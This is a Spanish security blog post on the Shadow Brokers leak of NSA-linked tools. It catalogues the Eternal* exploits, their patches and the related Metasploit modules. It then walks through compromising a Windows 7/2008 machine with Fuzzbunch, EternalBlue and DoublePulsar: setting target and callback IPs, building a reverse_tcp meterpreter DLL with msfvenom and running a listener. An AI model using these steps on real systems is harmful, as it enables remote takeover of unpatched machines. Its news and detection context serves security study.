Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1090
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
▼
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
▼
abril
(Total:
31
)
- Falsas guias de juegos engañan a 2 millones de usu...
- Tamper Chrome: el TamperData de Firefox para Chrome
- Vulnerabilidad crítica en módulo de Drupal
- Shadow Brokers: Framework Fuzzbunch y los exploits...
- Disponible Kali Linux Edición 2017.1
- FlexiSpy, empresa que vende software espía es hack...
- Récord sentencia delitos informáticos: 27 años de ...
- Botnets justicieras: Hajime y BrickerBot; la antít...
- IDS/IPS Suricata
- Demandan a Bose por espiar la música con sus auric...
- Apps fraudulentas en Google Play
- Múltiples vulnerabilidades Smart-Wifi de routers L...
- jSQL Injection: herramienta automatizada en Java p...
- El ayuntamiento de Rialp también es víctima de un ...
- Protocolo CLDAP permite realizar ataques DDoS con ...
- Desarticulado un grupo de cibercriminales por come...
- Pwnbox: herramientas de hacking en Docker
- Nintendo pagará por encontrar fallos de seguridad ...
- AMD Ryzen aplasta a un Mac Pro en pruebas de rendi...
- Vulnerabilidad crítica en todas las versiones de O...
- Detenido en Barcelona ruso acusado de interferir e...
- Fabricante de puertas de garaje bloquea las de un ...
- Tizen de Samsung es un coladero: 40 vulnerabilidad...
- La tarjeta gráfica más potente: Titan XP con 3.840...
- Hackean el servidor de HazteOir y amenazan con pub...
- Encuesta lenguajes de programación preferidos en S...
- Actualiza tu iPhone e iPad para evitar ser hackead...
- Vulnerabilidad en Samba permite acceder a ficheros...
- Skimmers en cajeros automáticos para robarte dinero
- La memoria RAM DDR5 ofrecerá el doble de velocidad...
- Escaners de vulnerabilidades para WordPress y Joomla
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
396
)
privacidad
(
364
)
google
(
355
)
ransomware
(
341
)
vulnerabilidad
(
305
)
Malware
(
265
)
Windows
(
246
)
android
(
244
)
cve
(
237
)
tutorial
(
237
)
manual
(
222
)
software
(
206
)
hardware
(
196
)
linux
(
127
)
twitter
(
117
)
ddos
(
95
)
WhatsApp
(
92
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
68
)
app
(
65
)
Networking
(
57
)
nvidia
(
53
)
ssd
(
51
)
youtube
(
50
)
firmware
(
44
)
adobe
(
43
)
office
(
41
)
hack
(
40
)
firefox
(
36
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
apache
(
26
)
MAC
(
25
)
programación
(
25
)
exploit
(
23
)
multimedia
(
23
)
javascript
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
En la Operación Torpedo el FBI utilizó Metasploit Framework , un software totalmente libre construido originalmente sobre lenguaje Perl y p...
-
Recientemente, 2K Games ha sufrido un ataque dentro de su plataforma de soporte técnico. Dicha plataforma, fue hackeada y utilizada para...
Shadow Brokers: Framework Fuzzbunch y los exploits Eternalblue & Doublepulsar
viernes, 28 de abril de 2017
|
Publicado por
el-brujo
|
Editar entrada
El pasado viernes 14 de Abril, The Shadow Brokers publicó una gran
cantidad de herramientas pertenecientes al arsenal de Equation Group s (sospechosamente vinculado a la NSA). Se puede
encontrar dichas herramientas en el repositorio de Github de misterch0c.
El conjunto de herramientas de hacking está orientado a Windows XP, Windows Server 2003, Windows 7 y 8 y Windows 2012. Microsoft lpublicó los parches para todas las vulnerabilidades explotadas, pero aún existen riesgos en sistemas no compatibles, así como con aquellos que aún no han instalado los parches.
De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar.
Exploit - Parches de Microsoft
DoublePulsar es una puerta trasera (backdoor) utilizada para inyectar y ejecutar código malicioso en sistemas ya infectados, y se instala utilizando la vulnerabilidad EternalBlue que se dirige a los servicios de intercambio de archivos SMB en Windows (puerto 445). Para comprometer una máquina, se debe estar ejecutando una versión vulnerable del sistema operativo Windows con servicio SMB expuesto.
Múltiples investigadores de seguridad han realizado análisis en masa en los últimos días y han encontrado decenas de miles de computadoras Windows en todo el mundo infectadas con DoublePulsar, el implante espía de la NSA. Los investigadores han publicado una herramienta gratuita en GitHub para que cualquiera pueda usarla.
Se ha publicado en GitHub un script, llamado doublepulsar-detection-script, pensado, como su nombre indica, para detectar esta backdoor de la NSA y eliminarla de los ordenadores.
Sheila A. Berta (@UnaPibaGeek) de ElevenPaths publicó en Exploit-DB un paper, también con versión en inglés, en el que se explica cómo explotar la vulnerabilidad Eternalblue & Doublepulsar para obtener una Shell apoyándose en Powershell Empire para lograr, posteriormente, un Meterpreter de Metasploit.
EXPLOTAR ETERNALBLUE & DOUBLEPULSAR PARA OBTENER UNA SHELL DE EMPIRE/METERPRETER EN WINDOWS 7/2008
¿Por qué Eternalblue & Doublepulsar? La respuesta es sencilla, ya que entre los exploits que se publicaron, Eternalblue es el único que se puede utilizar para atacar sistemas Windows 7 y Windows Server 2008 R2 sin necesidad de autenticación. Por lo que, Eternalblue es el exploit que nos permitirá aprovecharnos de un fallo de seguridad en el protocolo SMB para que, posteriormente, Doublepulsar pueda inyectar remotamente, por ejemplo, una DLL, ya que existen otras posibilidades.
Dependecias de Fuzzbunch
Sólo funciona para equipos 32 bits, ya que se compilan para una arquitectura x86 ya que las fuentes de los binarios no están disponibles. No funciona en 64 bits.
Se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.
Exploits de Fuzzbunch
Se puede hacer con un “git clone” o descargando el repositorio directamente:
Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:
Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:
These plugins are dispatched into several categories:
Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.
Para generar la dll podemos hacer uso de msfvenom:
Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:
Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.
Fuentes:
http://www.elladodelmal.com/2017/04/hackear-windows-7-2008-r2-con.html
http://blog.segu-info.com.ar/2017/04/herramienta-para-detectar-doublepulsar.html
http://blog.segu-info.com.ar/2017/04/integracion-de-eternalblue-y.html
https://www.securityartwork.es/2017/04/21/shadow-brokers-explotando-eternalblue-doublepulsar/
https://zerosum0x0.blogspot.com.es/2017/04/doublepulsar-initial-smb-backdoor-ring.html
El grupo Shadow Brokers libera una nueva hornada de exploits de la NSA
Ya se han comenzado a explotar las herramientas de hacking de la NSA filtradas el fin de semana pasado por ShadowBrokers y esto se ve facilitado porque hay cientos o miles de sistemas Windows vulnerables y expuestos a Internet.El conjunto de herramientas de hacking está orientado a Windows XP, Windows Server 2003, Windows 7 y 8 y Windows 2012. Microsoft lpublicó los parches para todas las vulnerabilidades explotadas, pero aún existen riesgos en sistemas no compatibles, así como con aquellos que aún no han instalado los parches.
- ETERNALROMANCE — Remote privilege escalation (SYSTEM) exploit (Windows XP to Windows 2008 over TCP port 445)
- ENTERNALCHAMPION, ETERNALSYSTEM — Remote exploit up to Windows 8 and 2012
- ETERNALBLUE — Remote Exploit via SMB & NBT (Windows XP to Windows 2012)
- EXPLODINGCAN — Remote IIS 6.0 exploit for Windows 2003
- EWORKFRENZY — Lotus Domino 6.5.4 and 7.0.2 exploit
- ETERNALSYNERGY — Windows 8 and Windows Server 2012
EASYBEE appears to be an MDaemon email server vulnerability [source, source, source]
EASYPI is an IBM Lotus Notes exploit [source, source] that gets detected as Stuxnet [source]
EWOKFRENZY is an exploit for IBM Lotus Domino 6.5.4 to 7.0.2 [source, source]
EXPLODINGCAN is an IIS 6.0 exploit that creates a remote backdoor [source, source]
ETERNALROMANCE is a SMBv1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges [source, source]
EDUCATEDSCHOLAR is a SMB exploit [source, source]
EMERALDTHREAD is a SMB exploit for Windows XP and Server 2003 [source, source]
EMPHASISMINE is a remote IMAP exploit for IBM Lotus Domino [source, source]
ENGLISHMANSDENTIST sets Outlook Exchange WebAccess rules to trigger executable code on the client's side to send an email to other users [source, source]
ERRATICGOPHER is a SMBv1 exploit targeting Windows XP and Server 2003 [source, source]
ETERNALSYNERGY is a SMBv3 remote code execution flaw for Windows 8 and Server 2012 [source, source, source]
ETERNALBLUE is a SMBv2 exploit [source]
ETERNALCHAMPION is a SMBv1 exploit [source]
ESKIMOROLL is a Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers [source, source]
ESTEEMAUDIT is an RDP exploit and backdoor for Windows Server 2003 [source, source]
ECLIPSEDWING is an RCE exploit for the Server service in Windows Server 2008 and later [source, source]
EXPANDINGPULLEY is another Windows implant [source]
GROK is a keylogger for Windows, also known about since Snowden [source]
ETRE is an exploit for IMail 8.10 to 8.22 [source]
FUZZBUNCH is an exploit framework, similar to MetaSploit [source, source], which was also part of the December-January "Windows Tools" Shadow Brokers auction [source]
DOUBLEPULSAR is a RING-0 multi-version kernel mode payload [source]
PASSFREELY is a tool that bypasses authentication for Oracle servers [source]
EquationGroup had scripts that could scrape Oracle databases for SWIFT data [source, source]
ODDJOB is an implant builder and C&C server that can deliver exploits for Windows 2000 and later [source, source], also not detected by any AV vendors [source]
Metadata [possibly faked, possibly real] links NSA to Equation Group [source]
NSA used TrueCrypt for storing operation notes [source]
Some of the Windows exploits released today were undetectable on VirusTotal [source]
Some EquationGroup humor in the oddjob instructions manual [source, source]
JEEPFLEA_MARKET appears to be an operation for collecting data from several banks around the world [source], previously linked to the NSA by Snowden [source, source]
The Equation Group targeted EastNets, a SWIFT connectivity provider [source, source, source, source, source]
De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar.
Exploit - Parches de Microsoft
- “EternalBlue” - MS17-010
- “EmeraldThread” - MS10-061
- “EternalChampion” - CVE-2017-0146 & CVE-2017-0147
- “ErraticGopher” Addressed prior to the release of Windows Vista
- “EsikmoRoll” - MS14-068
- “EternalRomance” - MS17-010
- “EducatedScholar” - MS09-050
- “EternalSynergy” - MS17-010
- “EclipsedWing” - MS08-067
Módulos Metasploit
EternalBlue
|
MS17-010
|
auxiliary/scanner/smb/smb_ms17_010
|
EmeraldThread
|
MS10-061
|
exploit/windows/smb/psexec
|
EternalChampion
|
MS17-010
|
auxiliary/scanner/smb/smb_ms17_010
|
EskimoRoll
|
MS14-068 / CVE-2014-6324
|
auxiliary/admin/kerberos/ms14_068_kerberos_checksum
|
EternalRomance
|
MS17-010
|
auxiliary/scanner/smb/smb_ms17_010
|
EducatedScholar
|
MS09-050
|
auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh,
auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff,
exploits/windows/smb/ms09_050_smb2_negotiate_func_index
|
EternalSynergy
|
MS17-010
|
auxiliary/scanner/smb/smb_ms17_010
|
EclipsedWing
|
MS08-067
|
auxiliary/scanner/smb/ms08_067_check
exploits/windows/smb/ms08_067_netapi
|
Eternalblue & Doublepulsar
DoublePulsar es una puerta trasera (backdoor) utilizada para inyectar y ejecutar código malicioso en sistemas ya infectados, y se instala utilizando la vulnerabilidad EternalBlue que se dirige a los servicios de intercambio de archivos SMB en Windows (puerto 445). Para comprometer una máquina, se debe estar ejecutando una versión vulnerable del sistema operativo Windows con servicio SMB expuesto.
Múltiples investigadores de seguridad han realizado análisis en masa en los últimos días y han encontrado decenas de miles de computadoras Windows en todo el mundo infectadas con DoublePulsar, el implante espía de la NSA. Los investigadores han publicado una herramienta gratuita en GitHub para que cualquiera pueda usarla.
Se ha publicado en GitHub un script, llamado doublepulsar-detection-script, pensado, como su nombre indica, para detectar esta backdoor de la NSA y eliminarla de los ordenadores.
Sheila A. Berta (@UnaPibaGeek) de ElevenPaths publicó en Exploit-DB un paper, también con versión en inglés, en el que se explica cómo explotar la vulnerabilidad Eternalblue & Doublepulsar para obtener una Shell apoyándose en Powershell Empire para lograr, posteriormente, un Meterpreter de Metasploit.
EXPLOTAR ETERNALBLUE & DOUBLEPULSAR PARA OBTENER UNA SHELL DE EMPIRE/METERPRETER EN WINDOWS 7/2008
¿Por qué Eternalblue & Doublepulsar? La respuesta es sencilla, ya que entre los exploits que se publicaron, Eternalblue es el único que se puede utilizar para atacar sistemas Windows 7 y Windows Server 2008 R2 sin necesidad de autenticación. Por lo que, Eternalblue es el exploit que nos permitirá aprovecharnos de un fallo de seguridad en el protocolo SMB para que, posteriormente, Doublepulsar pueda inyectar remotamente, por ejemplo, una DLL, ya que existen otras posibilidades.
Framework Fuzzbunch: el "Metasploit" de la NSA
Fuzzbunch ha sido el nombre de este framework con múltiples exploits de windows. Bautizado como "El mestasploit de la nsa". Programado en python 2.6 utiliza una versión antigua de pywin32.Dependecias de Fuzzbunch
- Python 2.6
- Pywin32
- Java.
Sólo funciona para equipos 32 bits, ya que se compilan para una arquitectura x86 ya que las fuentes de los binarios no están disponibles. No funciona en 64 bits.
Se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.
Exploits de Fuzzbunch
- Easybee-1.0.1.exe
- Easypi-3.1.0.exe
- Eclipsedwing-1.5.2.exe
- Educatedscholar-1.0.0.exe
- Emeraldthread-3.0.0.exe
- Emphasismine-3.4.0.exe
- Englishmansdentist-1.2.0.exe
- Erraticgopher-1.0.1.exe
- Eskimoroll-1.1.1.exe
- Esteemaudit-2.1.0.exe
- Eternalromance-1.3.0.exe
- Eternalromance-1.4.0.exe
- Eternalsynergy-1.0.1.exe
- Ewokfrenzy-2.0.0.exe
- Explodingcan-2.0.2.exe
- Eternalblue-2.2.0.exe
- Eternalchampion-2.0.0.exe
Se puede hacer con un “git clone” o descargando el repositorio directamente:
git clone https://github.com/x0rz/EQGRP_Lost_in_TranslationUna vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.
Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:
Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.
- Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
- PyWin32-221 para Python 2.6.6.
- Jre-6u15-windows-i-586.
Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:
Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>
- Default Default target IP Addres [] : IP de la víctima.
- Dafault Callback Addres [] : IP de nuestra máquina Windows.
- Use redirection[yes] : Establecer a ‘no’.
- Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.
These plugins are dispatched into several categories:
- Information gathering of the target and discovery of exploitable vulnerabilities: Architouch, Rpctouch, Domaintouch, Smbtouch, etc. ;
- Exploiting vulnerabilities: Emeraldthread, Eclipsedwing, Eternal*, etc. ;
- Post-exploitation after infection of the target: DouplePulsar, Regread, Regwrite, ...
fb> Show ExploitEternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.
fb > use Eternalblue
Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.
Para generar la dll podemos hacer uso de msfvenom:
msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll
Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp
Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.
Fuentes:
http://www.elladodelmal.com/2017/04/hackear-windows-7-2008-r2-con.html
http://blog.segu-info.com.ar/2017/04/herramienta-para-detectar-doublepulsar.html
http://blog.segu-info.com.ar/2017/04/integracion-de-eternalblue-y.html
https://www.securityartwork.es/2017/04/21/shadow-brokers-explotando-eternalblue-doublepulsar/
https://zerosum0x0.blogspot.com.es/2017/04/doublepulsar-initial-smb-backdoor-ring.html
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.